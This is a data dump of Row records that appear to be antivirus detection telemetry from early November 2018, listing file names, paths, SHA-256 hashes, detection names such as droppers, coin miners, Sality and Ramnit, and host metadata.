  Row(detection=Row(filename='74de5db7598d2bcb3ad2c23a84910509fb529233a76f0aa5ad243063f4fd94dd', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\74DE5DB7598D2BCB3AD2C23A84910509FB529233A76F0AA5AD243063F4FD94DD', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='74de5db7598d2bcb3ad2c23a84910509fb529233a76f0aa5ad243063f4fd94dd', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:26:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-182105-5667d518', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_81be5838\\AVSCAN-20181101-182004-4A328935\\AVSCAN-20181101-182105-5667D518', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:21:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-190449-edf1e2d9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190219-D4548F48\\AVSCAN-20181101-190449-EDF1E2D9', filesize=64000, name='TR/Siggen.64000.4.#M1.#R1'), hash='1a0201670260af68cb64af6267548b81214dc43129bf9e200edad39000c22236', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:04:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-120744-f643b0ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_46e468d5\\AVSCAN-20181101-120731-F461AB4D\\AVSCAN-20181101-120744-F643B0EF', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:07:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='D:\\PLAQUINHAS DIVERTIDAS\\PROGRAMAS\\Drivers Rodolfo\\Intel USB 3.0 Driver\\Setup.exe', filesize=1024000, name='W32/Stanit.#M1.#R1'), hash='43c78f49715d2f67d40bfe010a3d9d81a7ff22eeca4f82b9a24d8edd360f8b21', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:05:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='d3dx9.dll', filepath='E:\\Vape_2.47 Cracked by furyzzyt - Minecrafthax.net\\1.7.10\\d3dx9.dll', filesize=2048000, name='TR/Agent.qhhxz.#M1.#R1'), hash='6e4de412fb1dbf07c9133c38f9329dab3a1c3e68df9284693ff33064794cad97', metadata=Row(cmdline='d3dx9.dll,EntryPoint', country='JP', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=61952, timestamp='2018-11-01T04:24:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msiexec64.exe', filepath='C:\\Users\\X\\AppData\\Local\\NET.Framework SDK\\msiexec64.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='--engine=2 --session-id=ALRFtMKV5oy2A2R3DjrbyGRuDevcy7HQArKYyqUL --registry-suffix=ESET --enable-crash-reporting --srt-field-trial-group-name=NewCleanerUIExperiment', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.178.200\\software_reporter_tool.exe', parentsize=13460600, timestamp='2018-11-01T16:41:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='en.exe', filepath='F:\\New folder\\Corel Draw 12\\Apple\\EN\\EN.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T17:18:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-231813-c6a206e3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_22556673\\AVSCAN-20181101-231800-C4FF937B\\AVSCAN-20181101-231813-C6A206E3', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:18:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-140219-4dababe7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-140155-4A2FA7D7\\AVSCAN-20181101-140219-4DABABE7', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:02:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000b4554', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp000b4554', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:55:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tcupdater.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\TCSystem\\TCUpdater.exe', filesize=1088000, name='HEUR/APC.#M1.#R1'), hash='2778037bc22ff4333facb7e8bedea1523bd7a63a6a7476142b497339a65d269e', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:02:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-221054-4309b94c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e1e6ba50\\AVSCAN-20181101-220940-3546EEA7\\AVSCAN-20181101-221054-4309B94C', filesize=1536000, name='TR/Crypt.TPM.Gen.#M1.#R1'), hash='08af53c69828cc5c898e7047a1a410ce7f1b380464b7a82fcfa75e6925ba45a5', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:10:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T04:35:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T07:07:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='liveupdatelauncher.exe', filepath='C:\\Program Files (x86)\\Avanquest update\\LiveUpdateLauncher.exe', filesize=96000, name='W32/Neshta.A.#M1.#R1'), hash='a3f6f1a158bbc795c73b6df26e16b5582448b68e41de3a3bf5411b16a18fb5fa', metadata=Row(cmdline='\\\\\\/c', country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe', parentsize=185672, timestamp='2018-11-01T10:23:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093506-93319f91', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093506-93319F91', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:35:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094958-3e058309', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094958-3E058309', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:50:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150356-b9aa222d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150356-B9AA222D', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:04:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-171855-b21531e1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a6b3617\\AVSCAN-20181101-171731-A569503C\\AVSCAN-20181101-171855-B21531E1', filesize=64000, name='HEUR/Macro.Downloader.PAAJ.Gen.#M1.#R1'), hash='90ce259cefd378651b6877fd42418775c3ad0aa752713a5761a068fa403a22d4', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:18:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='codectweaktool.exe', filepath='C:\\Program Files (x86)\\K-Lite Codec Pack\\Tools\\CodecTweakTool.exe', filesize=1216000, name='W32/Jeefo.A.#M1.#R1'), hash='89293a60fbe5bcc3f18435e7491129b0dd79b3595afe9ea1c284f36a4305194f', metadata=Row(cmdline='--engine=2 --session-id=8YsoEh9XPV4LLlyuyfzuOr+VsXK2bOIfuptUHBMo --registry-suffix=ESET --enable-crash-reporting --srt-field-trial-group-name=NewCleanerUIExperiment', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.177.200\\software_reporter_tool.exe', parentsize=13449336, timestamp='2018-11-01T19:07:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150516-c8e1aa9b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150516-C8E1AA9B', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:05:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mfl_vc9.dll', filepath='C:\\Program Files (x86)\\MAGIX\\Audio Cleaning Lab 2016\\VideoExportMaker\\MFL_VC9.dll', filesize=772000, name='W32/Ramnit.C.#M1.#R1'), hash='8699632edbbbe3aa5850325e8192e7597af1ec7d087dde65a7eb592dc508444f', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T19:30:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='qrsp.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\QRSP.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:09:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154916-597c7298', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9964d971\\AVSCAN-20181101-154901-5679EAFA\\AVSCAN-20181101-154916-597C7298', filesize=14208000, name='TR/CoinMiner.uwtkf.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:49:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='prangkat wokrshop kartek 2 2015.exe', filepath='F:\\\xa0\\PRANGKAT WOKRSHOP Kartek 2 2015\\PRANGKAT WOKRSHOP Kartek 2 2015.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T02:29:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.vir', filepath='\\\\?\\C:\\Applications\\Service.VIR', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='putty.exe', filepath='\\\\ishq.local\\ishdfs\\Common\\Library\\~snapshot\\sv_daily.1\\Software\\OLD\\NetApp\\Putty\\putty.exe', filesize=512000, name='W32/Sality.Y.#M1.#R1'), hash='f36b6d1fcba331e24478910294eec7b1f989f8d79d97bfa15d6b246b09920cb0', metadata=Row(cmdline=None, country='AO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Trend\\SProtect\\x64\\SpntSvc.exe', parentsize=93696, timestamp='2018-11-01T11:57:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\2tddajhl40f\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:32:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='.trashes.exe', filepath='H:\\.Trashes.exe', filesize=384000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-01T21:15:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\g5dwikhyj1u\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:38:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155250-b8f5273f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32567766\\AVSCAN-20181101-153245-260801C5\\AVSCAN-20181101-155250-B8F5273F', filesize=124000, name='TR/Agent.ahovu.#M300.#R5130'), hash='b28a341093bb24af1aebafd73a975ac7eb06538547ce015b6027f700446b130a', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:22:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bf770e11dae387e600db125ed0cbdb935fe00223066b586dce323f746c5182f5', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\BF770E11DAE387E600DB125ED0CBDB935FE00223066B586DCE323F746C5182F5', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='bf770e11dae387e600db125ed0cbdb935fe00223066b586dce323f746c5182f5', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:30:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='clamav-ce0acf201481d8d02743f3ac8a421888.00006780.clamtmp', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\clamav-ce0acf201481d8d02743f3ac8a421888.00006780.clamtmp', filesize=3492000, name='HEUR/AGEN.1004588.#M1.#R1'), hash='bd084bc735e1692e99aefe29ee21c6cb037567b2e127cd686704a05f341b42ab', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Cybereason\\RansomFree\\CybereasonRansomFreeServiceHost.exe', parentsize=13824, timestamp='2018-11-01T23:54:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093452-907df6d4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093452-907DF6D4', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:34:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='diritto del lavoro.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\DIRITTO DEL LAVORO.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:22:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151805-5c6379bf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-151805-5C6379BF', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:18:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T08:48:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-04T16:19:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-04T17:06:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='imenubar.dll', filepath='C:\\Microgaming\\Poker\\redstarpoker\\control\\imenubar.dll', filesize=96000, name='GAME/Casino.Gen.#M1.#R1'), hash='9c70d52c17032f3c08a6e64a275519c7b90ed07895fad1a80b47ec5ff57ca95f', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Microgaming\\Poker\\redstarpoker\\mppoker.exe', parentsize=1214712, timestamp='2018-11-04T06:36:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered lecor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lecor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='20f94b9918d2d4b8ba837df710b9f8b32efc249a3f913cf61e67c410e41599f4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:11:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='steam_api_c.dll', filepath='C:\\Program Files\\Counter-Strike Xtreme V6\\steam_api_c.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='0d035a2cb0ae8a93bea6cffe9e2e40335f511afb26f966336f217661055274a5', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-04T01:27:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered lecor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lecor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='20f94b9918d2d4b8ba837df710b9f8b32efc249a3f913cf61e67c410e41599f4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T02:53:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-171927-35c7b89c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d8939ed1\\AVSCAN-20181104-170741-E3C4C545\\AVSCAN-20181104-171927-35C7B89C', filesize=704000, name='Adware/Graftor.146103.#M1.#R1'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline=None, country='SC', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:19:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131300-1f37bce2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-131300-1F37BCE2', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:12:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='service.exe', filepath='\\\\?\\C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='5931493c4c1b03b23fbf74fceab77280aac7a0a483e0fb86c9db29216ba97f1e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:25:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T15:59:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='incaball.exe', filepath='k:\\برنامج رامز واكل الجو\\العاب\\zuma inca ball\\IncaBall.exe', filesize=1536000, name='TR/Patched.Gen.#M300.#R3367'), hash='36fc227fd89fb50be0f5f2ba4530ac6e016805a3669d1b83868d1ac65cebeb36', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T22:28:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='67e024c7b69821b6455b765da977af76b50fef1bfca6a7217bcfedd8bfa5622c', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-04T07:03:34Z'), dt=datetime.date(2018, 11, 4)),
